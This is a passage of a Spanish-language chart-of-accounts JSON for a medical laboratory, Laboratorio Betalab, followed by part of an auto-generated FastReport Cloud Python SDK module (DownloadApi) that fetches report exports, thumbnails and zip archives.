"account_currency": "USD", "account_type": "Cash", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111500 - INVERSIONES - LB", "account_name": "INVERSIONES", "company": "Laboratorio Betalab", "parent_account": "111000 - EFECTIVO EN CAJA Y BANCO - LB", "account_number": "111500", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Bank", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "111501 - CERTIFICADO FINANCIERO LEON - LB", "account_name": "CERTIFICADO FINANCIERO LEON", "company": "Laboratorio Betalab", "parent_account": "111500 - INVERSIONES - LB", "account_number": "111501", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Bank", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112000 - CUENTAS POR COBRAR - LB", "account_name": "CUENTAS POR COBRAR", "company": "Laboratorio Betalab", "parent_account": "110000 - ACTIVOS CORRIENTES - LB", "account_number": "112000", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112103 - DEUDORES - LB", "account_name": "DEUDORES", "company": "Laboratorio Betalab", "parent_account": "112000 - CUENTAS POR COBRAR - LB", "account_number": "112103", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112100 - CLIENTES - LB", "account_name": "CLIENTES", "company": "Laboratorio Betalab", "parent_account": "112000 - CUENTAS POR COBRAR - LB", "account_number": "112100", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112101 - SEGUROS - LB", "account_name": "SEGUROS", "company": "Laboratorio Betalab", "parent_account": "112100 - CLIENTES - LB", "account_number": "112101", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Bank", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112102 - PACIENTES PRIVADOS - LB", "account_name": "PACIENTES PRIVADOS", "company": "Laboratorio Betalab", "parent_account": "112100 - CLIENTES - LB", "account_number": "112102", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_name": "FUNCIONARIOS Y EMPLEADOS", "company": "Laboratorio Betalab", "parent_account": "112000 - CUENTAS POR COBRAR - LB", "account_number": "112200", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112201 - DIMAS READ PIMENTEL - LB", "account_name": "DIMAS READ PIMENTEL", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112201", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112202 - JUAN GARCIA READ - LB", "account_name": "JUAN GARCIA READ", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112202", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112203 - ANTONIO AURELIO DE LA CRUZ - LB", "account_name": "ANTONIO AURELIO DE LA CRUZ", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112203", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112204 - SUSANA COLON DUARTE - LB", "account_name": "SUSANA COLON DUARTE", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112204", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112205 - VIOLETA MARTINEZ - LB", "account_name": "VIOLETA MARTINEZ", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112205", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112206 - CESARINA MARTE - LB", "account_name": "CESARINA MARTE", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112206", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112207 - ANYELINA ISABEL MEDRANO - LB", "account_name": "ANYELINA ISABEL MEDRANO", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112207", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112208 - ANDIRA READ - LB", "account_name": "ANDIRA READ", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112208", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112299 - C X C FUNCIONARIOS Y EMPLEADOS - LB", "account_name": "C X C FUNCIONARIOS Y EMPLEADOS", "company": "Laboratorio Betalab", "parent_account": "112200 - FUNCIONARIOS Y EMPLEADOS - LB", "account_number": "112299", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112300 - CHEQUES DEVUELTOS - LB", "account_name": "CHEQUES DEVUELTOS", "company": "Laboratorio Betalab", "parent_account": "112000 - CUENTAS POR COBRAR - LB", "account_number": "112300", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112400 - CUENTAS POR COBRAR TSS - LB", "account_name": "CUENTAS POR COBRAR TSS", "company": "Laboratorio Betalab", "parent_account": "112000 - CUENTAS POR COBRAR - LB", "account_number": "112400", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "112900 - OTRAS CUENTAS POR COBRAR - LB", "account_name": "OTRAS CUENTAS POR COBRAR", "company": "Laboratorio Betalab", "parent_account": "112000 - CUENTAS POR COBRAR - LB", "account_number": "112900", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Receivable", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "1400 - Stock Assets - LB", "account_name": "Stock Assets", "company": "Laboratorio Betalab", "parent_account": "110000 - ACTIVOS CORRIENTES - LB", "account_number": "1400", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Stock", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "1410 - Stock In Hand - LB", "account_name": "Stock In Hand", "company": "Laboratorio Betalab", "parent_account": "1400 - Stock Assets - LB", "account_number": "1410", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Stock", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "1500 - Tax Assets - LB", "account_name": "Tax Assets", "company": "Laboratorio Betalab", "parent_account": "110000 - ACTIVOS CORRIENTES - LB", "account_number": "1500", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "1600 - Loans and Advances (Assets) - LB", "account_name": "Loans and Advances (Assets)", "company": "Laboratorio Betalab", "parent_account": "110000 - ACTIVOS CORRIENTES - LB", "account_number": "1600", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "1650 - Securities and Deposits - LB", "account_name": "Securities and Deposits", "company": "Laboratorio Betalab", "parent_account": "110000 - ACTIVOS CORRIENTES - LB", "account_number": "1650", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "1651 - Earnest Money - LB", "account_name": "Earnest Money", "company": "Laboratorio Betalab", "parent_account": "1650 - Securities and Deposits - LB", "account_number": "1651", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "114000 - CENTRAL DE SUMINISTROS - LB", "account_name": "CENTRAL DE SUMINISTROS", "company": "Laboratorio Betalab", "parent_account": "110000 - ACTIVOS CORRIENTES - LB", "account_number": "114000", "is_group": 1, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "114010 - PLACAS RADIOGRAFICAS - LB", "account_name": "PLACAS RADIOGRAFICAS", "company": "Laboratorio Betalab", "parent_account": "114000 - CENTRAL DE SUMINISTROS - LB", "account_number": "114010", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Stock", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "114020 - MATERIALES SONOGRAFIA - LB", "account_name": "MATERIALES SONOGRAFIA", "company": "Laboratorio Betalab", "parent_account": "114000 - CENTRAL DE SUMINISTROS - LB", "account_number": "114020", "is_group": 0, "root_type": "Asset", "report_type": "Balance Sheet", "account_currency": "DOP", "account_type": "Stock", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "114030 - 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HONORARIOS PROFESIONALES COMPAÑIAS - LB", "account_name": "HONORARIOS PROFESIONALES COMPAÑIAS", "company": "Laboratorio Betalab", "parent_account": "640000 - GESTION GENERAL - LB", "account_number": "641100", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "650000 - MATERIALES DE OPERACION - LB", "account_name": "MATERIALES DE OPERACION", "company": "Laboratorio Betalab", "parent_account": "600000 - GASTOS - LB", "account_number": "650000", "is_group": 1, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "650100 - PLACAS RADIOGRAFICAS - LB", "account_name": "PLACAS RADIOGRAFICAS", "company": "Laboratorio Betalab", "parent_account": "650000 - MATERIALES DE OPERACION - LB", "account_number": "650100", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "650200 - ROLLOS PARA SONOGRAFIA - LB", "account_name": "ROLLOS PARA SONOGRAFIA", "company": "Laboratorio Betalab", "parent_account": "650000 - MATERIALES DE OPERACION - LB", "account_number": "650200", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "650300 - REVELADOR Y FIJADOR DE RAYOS X - LB", "account_name": "REVELADOR Y FIJADOR DE RAYOS X", "company": "Laboratorio Betalab", "parent_account": "650000 - MATERIALES DE OPERACION - LB", "account_number": "650300", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "650400 - MEDIO DE CONTRASTE - LB", "account_name": "MEDIO DE CONTRASTE", "company": "Laboratorio Betalab", "parent_account": "650000 - MATERIALES DE OPERACION - LB", "account_number": "650400", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "650500 - MATERIAL GASTABLE - LB", "account_name": "MATERIAL GASTABLE", "company": "Laboratorio Betalab", "parent_account": "650000 - MATERIALES DE OPERACION - LB", "account_number": "650500", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "650900 - OTROS - LB", "account_name": "OTROS", "company": "Laboratorio Betalab", "parent_account": "650000 - MATERIALES DE OPERACION - LB", "account_number": "650900", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "114050 - MATERIAL GASTABLE - LB", "account_name": "MATERIAL GASTABLE", "company": "Laboratorio Betalab", "parent_account": "650000 - MATERIALES DE OPERACION - LB", "account_number": "114050", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Income Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "660000 - REPARACIONES Y MANTENIMIENTO - LB", "account_name": "REPARACIONES Y MANTENIMIENTO", "company": "Laboratorio Betalab", "parent_account": "600000 - GASTOS - LB", "account_number": "660000", "is_group": 1, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "660100 - REPARACION EQUIPOS DIAGNOSTICOS - LB", "account_name": "REPARACION EQUIPOS DIAGNOSTICOS", "company": "Laboratorio Betalab", "parent_account": "660000 - REPARACIONES Y MANTENIMIENTO - LB", "account_number": "660100", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "660200 - REPARACION EDIFICIOS - LB", "account_name": "REPARACION EDIFICIOS", "company": "Laboratorio Betalab", "parent_account": "660000 - REPARACIONES Y MANTENIMIENTO - LB", "account_number": "660200", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "660300 - REPARACION EQUIPOS DE OFICINA - LB", "account_name": "REPARACION EQUIPOS DE OFICINA", "company": "Laboratorio Betalab", "parent_account": "660000 - REPARACIONES Y MANTENIMIENTO - LB", "account_number": "660300", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "660400 - REPARACION OTROS ACTIVOS - LB", "account_name": "REPARACION OTROS ACTIVOS", "company": "Laboratorio Betalab", "parent_account": "660000 - REPARACIONES Y MANTENIMIENTO - LB", "account_number": "660400", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "660500 - MANTENIMIENTOS DE ACTIVO FIJO - LB", "account_name": "MANTENIMIENTOS DE ACTIVO FIJO", "company": "Laboratorio Betalab", "parent_account": "660000 - REPARACIONES Y MANTENIMIENTO - LB", "account_number": "660500", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "660900 - MANTENIMIENTO OTROS - LB", "account_name": "MANTENIMIENTO OTROS", "company": "Laboratorio Betalab", "parent_account": "660000 - REPARACIONES Y MANTENIMIENTO - LB", "account_number": "660900", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "670000 - GASTOS FINANCIEROS - LB", "account_name": "GASTOS FINANCIEROS ", "company": "Laboratorio Betalab", "parent_account": "600000 - GASTOS - LB", "account_number": "670000", "is_group": 1, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "670100 - GASTOS BANCARIOS - LB", "account_name": "GASTOS BANCARIOS", "company": "Laboratorio Betalab", "parent_account": "670000 - GASTOS FINANCIEROS - LB", "account_number": "670100", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "670200 - INTERESES SOBRE PRESTAMOS - LB", "account_name": "INTERESES SOBRE PRESTAMOS", "company": "Laboratorio Betalab", "parent_account": "670000 - GASTOS FINANCIEROS - LB", "account_number": "670200", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "670300 - IMPUESTOS A LOS CHEQUES Y TRANSFERENCIAS - LB", "account_name": "IMPUESTOS A LOS CHEQUES Y TRANSFERENCIAS", "company": "Laboratorio Betalab", "parent_account": "670000 - GASTOS FINANCIEROS - LB", "account_number": "670300", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "680000 - DEPRECIACION Y AMORTIZACION - LB", "account_name": "DEPRECIACION Y AMORTIZACION", "company": "Laboratorio Betalab", "parent_account": "600000 - GASTOS - LB", "account_number": "680000", "is_group": 1, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "680100 - DEPRECIACION ACTIVOS FIJOS - LB", "account_name": "DEPRECIACION ACTIVOS FIJOS", "company": "Laboratorio Betalab", "parent_account": "680000 - DEPRECIACION Y AMORTIZACION - LB", "account_number": "680100", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "680200 - GASTOS MEJORAS EN PROPIEDAD ARRENDADA - LB", "account_name": "GASTOS MEJORAS EN PROPIEDAD ARRENDADA", "company": "Laboratorio Betalab", "parent_account": "680000 - DEPRECIACION Y AMORTIZACION - LB", "account_number": "680200", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "Expense Account", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" }, { "name": "690000 - OTROS GASTOS - LB", "account_name": "OTROS GASTOS", "company": "Laboratorio Betalab", "parent_account": "600000 - GASTOS - LB", "account_number": "690000", "is_group": 0, "root_type": "Expense", "report_type": "Profit and Loss", "account_currency": "DOP", "account_type": "", "tax_rate": 0, "freeze_account": "No", "balance_must_be": "" } ]

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Python

fastreport_cloud_sdk/api/download_api.py

FastReports/FastReport-Cloud-Python

4442e19ef4c980222ede6d9e0597f564d6d85b26

[ "MIT" ]

null

fastreport_cloud_sdk/api/download_api.py

FastReports/FastReport-Cloud-Python

4442e19ef4c980222ede6d9e0597f564d6d85b26

[ "MIT" ]

null

fastreport_cloud_sdk/api/download_api.py

FastReports/FastReport-Cloud-Python

4442e19ef4c980222ede6d9e0597f564d6d85b26

[ "MIT" ]

null

# coding: utf-8 """ FastReport Cloud No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501 The version of the OpenAPI document: v1 Generated by: https://openapi-generator.tech """ from __future__ import absolute_import import re # noqa: F401 # python 2 and python 3 compatibility library import six from fastreport_cloud_sdk.api_client import ApiClient from fastreport_cloud_sdk.exceptions import ( # noqa: F401 ApiTypeError, ApiValueError ) class DownloadApi(object): """NOTE: This class is auto generated by OpenAPI Generator Ref: https://openapi-generator.tech Do not edit the class manually. """ def __init__(self, api_client=None): if api_client is None: api_client = ApiClient() self.api_client = api_client def download_get_export(self, id, **kwargs): # noqa: E501 """Returns a export file with specified id # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_export(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param preview: :type preview: bool :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_export_with_http_info(id, **kwargs) # noqa: E501 def download_get_export_with_http_info(self, id, **kwargs): # noqa: E501 """Returns a export file with specified id # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_export_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param preview: :type preview: bool :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id', 'preview' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_export" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `download_get_export`") # noqa: E501 if self.api_client.client_side_validation and 'id' in local_var_params and not re.search(r'^[A-Fa-f0-9]{24}$', local_var_params['id']): # noqa: E501 raise ApiValueError("Invalid value for parameter `id` when calling `download_get_export`, must conform to the pattern `/^[A-Fa-f0-9]{24}$/`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] if 'preview' in local_var_params and local_var_params['preview'] is not None: # noqa: E501 query_params.append(('preview', local_var_params['preview'])) # noqa: E501 header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['application/octet-stream', 'application/pdf', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 404: "ProblemDetails", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", } return self.api_client.call_api( '/download/e/{id}', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def download_get_export_thumbnail(self, id, **kwargs): # noqa: E501 """Returns export's thumbnail # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_export_thumbnail(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_export_thumbnail_with_http_info(id, **kwargs) # noqa: E501 def download_get_export_thumbnail_with_http_info(self, id, **kwargs): # noqa: E501 """Returns export's thumbnail # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_export_thumbnail_with_http_info(id, async_req=True) >>> result = thread.get() :param id: (required) :type id: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'id' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise ApiTypeError( "Got an unexpected keyword argument '%s'" " to method download_get_export_thumbnail" % key ) local_var_params[key] = val del local_var_params['kwargs'] # verify the required parameter 'id' is set if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501 local_var_params['id'] is None): # noqa: E501 raise ApiValueError("Missing the required parameter `id` when calling `download_get_export_thumbnail`") # noqa: E501 if self.api_client.client_side_validation and 'id' in local_var_params and not re.search(r'^[A-Fa-f0-9]{24}$', local_var_params['id']): # noqa: E501 raise ApiValueError("Invalid value for parameter `id` when calling `download_get_export_thumbnail`, must conform to the pattern `/^[A-Fa-f0-9]{24}$/`") # noqa: E501 collection_formats = {} path_params = {} if 'id' in local_var_params: path_params['id'] = local_var_params['id'] # noqa: E501 query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = None # HTTP header `Accept` header_params['Accept'] = self.api_client.select_header_accept( ['image/png', 'image/jpeg', 'application/json']) # noqa: E501 # Authentication setting auth_settings = ['ApiKey', 'JWT'] # noqa: E501 response_types_map = { 200: "file", 404: "ProblemDetails", 400: "ProblemDetails", 402: "ProblemDetails", 403: "ProblemDetails", } return self.api_client.call_api( '/download/e/{id}/thumbnail', 'GET', path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_types_map=response_types_map, auth_settings=auth_settings, async_req=local_var_params.get('async_req'), _return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501 _preload_content=local_var_params.get('_preload_content', True), _request_timeout=local_var_params.get('_request_timeout'), collection_formats=collection_formats, _request_auth=local_var_params.get('_request_auth')) def download_get_exports(self, archive_name, **kwargs): # noqa: E501 """Returns a zip archive with selected ids # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_exports(archive_name, async_req=True) >>> result = thread.get() :param archive_name: name of the created archive (required) :type archive_name: str :param ids: ids separated with a ',' sign :type ids: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: file """ kwargs['_return_http_data_only'] = True return self.download_get_exports_with_http_info(archive_name, **kwargs) # noqa: E501 def download_get_exports_with_http_info(self, archive_name, **kwargs): # noqa: E501 """Returns a zip archive with selected ids # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.download_get_exports_with_http_info(archive_name, async_req=True) >>> result = thread.get() :param archive_name: name of the created archive (required) :type archive_name: str :param ids: ids separated with a ',' sign :type ids: str :param async_req: Whether to execute the request asynchronously. :type async_req: bool, optional :param _return_http_data_only: response data without head status code and headers :type _return_http_data_only: bool, optional :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :type _preload_content: bool, optional :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :param _request_auth: set to override the auth_settings for an a single request; this effectively ignores the authentication in the spec for a single request. :type _request_auth: dict, optional :return: Returns the result object. If the method is called asynchronously, returns the request thread. :rtype: tuple(file, status_code(int), headers(HTTPHeaderDict)) """ local_var_params = locals() all_params = [ 'archive_name', 'ids' ] all_params.extend( [ 'async_req', '_return_http_data_only', '_preload_content', '_request_timeout', '_request_auth' ] ) for key, val in six.iteritems(local_var_params['kwargs']): if key not in all_params: raise 